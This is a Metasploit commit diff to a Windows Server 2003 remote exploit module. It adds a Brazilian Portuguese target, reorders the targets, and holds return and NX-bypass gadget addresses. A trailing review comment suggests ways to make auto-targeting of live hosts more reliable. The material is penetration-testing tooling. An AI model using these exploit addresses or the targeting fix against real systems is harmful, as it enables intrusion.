Add Portuguese target, lands #3961 (also reorders targets)

bug/bundler_fix
HD Moore 2014-12-12 14:23:02 -06:00
parent 183acb9582
commit 50b734f996
1 changed files with 93 additions and 79 deletions


@ -88,6 +88,14 @@ class Metasploit3 < Msf::Exploit::Remote
} }
], # JMP ESI SVCHOST.EXE ], # JMP ESI SVCHOST.EXE
# Standard return-to-ESI without NX bypass
['Windows 2003 SP0 Universal',
{
'Ret' => 0x0100129e,
'Scratch' => 0x00020408,
}
], # JMP ESI SVCHOST.EXE
# #
# ENGLISH TARGETS # ENGLISH TARGETS
# #
@ -128,79 +136,6 @@ class Metasploit3 < Msf::Exploit::Remote
} }
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Standard return-to-ESI without NX bypass
['Windows 2003 SP0 Universal',
{
'Ret' => 0x0100129e,
'Scratch' => 0x00020408,
}
], # JMP ESI SVCHOST.EXE
# Standard return-to-ESI without NX bypass
['Windows 2003 SP1 English (NO NX)',
{
'Ret' => 0x71bf21a2,
'Scratch' => 0x00020408,
}
], # JMP ESI WS2HELP.DLL
# Brett Moore's crafty NX bypass for 2003 SP1
['Windows 2003 SP1 English (NX)',
{
'RetDec' => 0x7c90568c, # dec ESI, ret @SHELL32.DLL
'RetPop' => 0x7ca27cf4, # push ESI, pop EBP, ret @SHELL32.DLL
'JmpESP' => 0x7c86fed3, # jmp ESP @NTDLL.DLL
'DisableNX' => 0x7c83e413, # NX disable @NTDLL.DLL
'Scratch' => 0x00020408,
}
],
# Standard return-to-ESI without NX bypass
['Windows 2003 SP1 Japanese (NO NX)',
{
'Ret' => 0x71a921a2,
'Scratch' => 0x00020408,
}
], # JMP ESI WS2HELP.DLL
# Standard return-to-ESI without NX bypass
['Windows 2003 SP2 English (NO NX)',
{
'Ret' => 0x71bf3969,
'Scratch' => 0x00020408,
}
], # JMP ESI WS2HELP.DLL
# Brett Moore's crafty NX bypass for 2003 SP2
['Windows 2003 SP2 English (NX)',
{
'RetDec' => 0x7c86beb8, # dec ESI, ret @NTDLL.DLL
'RetPop' => 0x7ca1e84e, # push ESI, pop EBP, ret @SHELL32.DLL
'JmpESP' => 0x7c86a01b, # jmp ESP @NTDLL.DLL
'DisableNX' => 0x7c83f517, # NX disable @NTDLL.DLL
'Scratch' => 0x00020408,
}
],
# Standard return-to-ESI without NX bypass
['Windows 2003 SP2 German (NO NX)',
{
'Ret' => 0x71a03969,
'Scratch' => 0x00020408,
}
], # JMP ESI WS2HELP.DLL
# Brett Moore's crafty NX bypass for 2003 SP2
['Windows 2003 SP2 German (NX)',
{
'RetDec' => 0x7c98beb8, # dec ESI, ret @NTDLL.DLL
'RetPop' => 0x7cb3e84e, # push ESI, pop EBP, ret @SHELL32.DLL
'JmpESP' => 0x7c98a01b, # jmp ESP @NTDLL.DLL
'DisableNX' => 0x7c95f517, # NX disable @NTDLL.DLL
'Scratch' => 0x00020408,
}
],
# #
# NON-ENGLISH TARGETS - AUTOMATICALLY GENERATED # NON-ENGLISH TARGETS - AUTOMATICALLY GENERATED
# #
@ -637,12 +572,34 @@ class Metasploit3 < Msf::Exploit::Remote
} }
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
#
# Windows 2003 Targets
#
# Standard return-to-ESI without NX bypass # Standard return-to-ESI without NX bypass
# Provided by Masashi Fujiwara ['Windows 2003 SP1 English (NO NX)',
['Windows 2003 SP2 Japanese (NO NX)',
{ {
'Ret' => 0x71a91ed2, 'Ret' => 0x71bf21a2,
'Scratch' => 0x00020408 'Scratch' => 0x00020408,
}
], # JMP ESI WS2HELP.DLL
# Brett Moore's crafty NX bypass for 2003 SP1
['Windows 2003 SP1 English (NX)',
{
'RetDec' => 0x7c90568c, # dec ESI, ret @SHELL32.DLL
'RetPop' => 0x7ca27cf4, # push ESI, pop EBP, ret @SHELL32.DLL
'JmpESP' => 0x7c86fed3, # jmp ESP @NTDLL.DLL
'DisableNX' => 0x7c83e413, # NX disable @NTDLL.DLL
'Scratch' => 0x00020408,
}
],
# Standard return-to-ESI without NX bypass
['Windows 2003 SP1 Japanese (NO NX)',
{
'Ret' => 0x71a921a2,
'Scratch' => 0x00020408,
} }
], # JMP ESI WS2HELP.DLL ], # JMP ESI WS2HELP.DLL
@ -665,6 +622,54 @@ class Metasploit3 < Msf::Exploit::Remote
} }
], ],
# Standard return-to-ESI without NX bypass
['Windows 2003 SP2 English (NO NX)',
{
'Ret' => 0x71bf3969,
'Scratch' => 0x00020408,
}
], # JMP ESI WS2HELP.DLL
# Brett Moore's crafty NX bypass for 2003 SP2
['Windows 2003 SP2 English (NX)',
{
'RetDec' => 0x7c86beb8, # dec ESI, ret @NTDLL.DLL
'RetPop' => 0x7ca1e84e, # push ESI, pop EBP, ret @SHELL32.DLL
'JmpESP' => 0x7c86a01b, # jmp ESP @NTDLL.DLL
'DisableNX' => 0x7c83f517, # NX disable @NTDLL.DLL
'Scratch' => 0x00020408,
}
],
# Standard return-to-ESI without NX bypass
['Windows 2003 SP2 German (NO NX)',
{
'Ret' => 0x71a03969,
'Scratch' => 0x00020408,
}
], # JMP ESI WS2HELP.DLL
# Brett Moore's crafty NX bypass for 2003 SP2
['Windows 2003 SP2 German (NX)',
{
'RetDec' => 0x7c98beb8, # dec ESI, ret @NTDLL.DLL
'RetPop' => 0x7cb3e84e, # push ESI, pop EBP, ret @SHELL32.DLL
'JmpESP' => 0x7c98a01b, # jmp ESP @NTDLL.DLL
'DisableNX' => 0x7c95f517, # NX disable @NTDLL.DLL
'Scratch' => 0x00020408,
}
],
# Brett Moore's crafty NX bypass for 2003 SP2 (target by Anderson Bargas)
[ 'Windows 2003 SP2 Portuguese - Brazilian (NX)',
{
'RetDec' => 0x7c97beb8, # dec ESI, ret @NTDLL.DLL OK
'RetPop' => 0x7cb2e84e, # push ESI, pop EBP, ret @SHELL32.DLL OK
'JmpESP' => 0x7c97a01b, # jmp ESP @NTDLL.DLL OK
'DisableNX' => 0x7c94f517, # NX disable @NTDLL.DLL
'Scratch' => 0x00020408,
}
],
# Standard return-to-ESI without NX bypass # Standard return-to-ESI without NX bypass
['Windows 2003 SP2 Spanish (NO NX)', ['Windows 2003 SP2 Spanish (NO NX)',
{ {
@ -682,7 +687,16 @@ class Metasploit3 < Msf::Exploit::Remote
'DisableNX' => 0x7c83f517, # NX disable @NTDLL.DLL 'DisableNX' => 0x7c83f517, # NX disable @NTDLL.DLL
'Scratch' => 0x00020408, 'Scratch' => 0x00020408,
} }
] ],
# Standard return-to-ESI without NX bypass
# Provided by Masashi Fujiwara
['Windows 2003 SP2 Japanese (NO NX)',
{
'Ret' => 0x71a91ed2,
'Scratch' => 0x00020408
}
], # JMP ESI WS2HELP.DLL
# #
# Missing Targets # Missing Targets
@ -826,7 +840,7 @@ class Metasploit3 < Msf::Exploit::Remote
# Windows 2003 SP0 is mostly universal # Windows 2003 SP0 is mostly universal
if fprint['os'] == 'Windows 2003' and fprint['sp'] == 'No Service Pack' if fprint['os'] == 'Windows 2003' and fprint['sp'] == 'No Service Pack'
mytarget = targets[7] mytarget = targets[3]
end end
# Windows 2003 R2 is treated the same as 2003 # Windows 2003 R2 is treated the same as 2003
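Review bot: `mytarget = targets[3]` in this hunk still selects the Windows 2003 SP0 universal target by its position in the `targets` array, which is exactly the coupling this commit had to repair after reordering (the old value was `targets[7]`); the next insertion or reorder of targets will silently desynchronise automatic targeting again and send the wrong return address to a live host. Looking the target up by name removes that dependency: `mytarget = targets.find { |t| t.name == 'Windows 2003 SP0 Universal' }`, with a comment such as `# look up by name so reordering the target list cannot break auto-targeting`. The start of the `targets` array is outside this hunk, so whether index 3 currently matches the 'Windows 2003 SP0 Universal' entry added in the first hunk cannot be verified here; a by-name lookup sidesteps that question entirely. The enclosing method that reads `fprint` begins before this hunk.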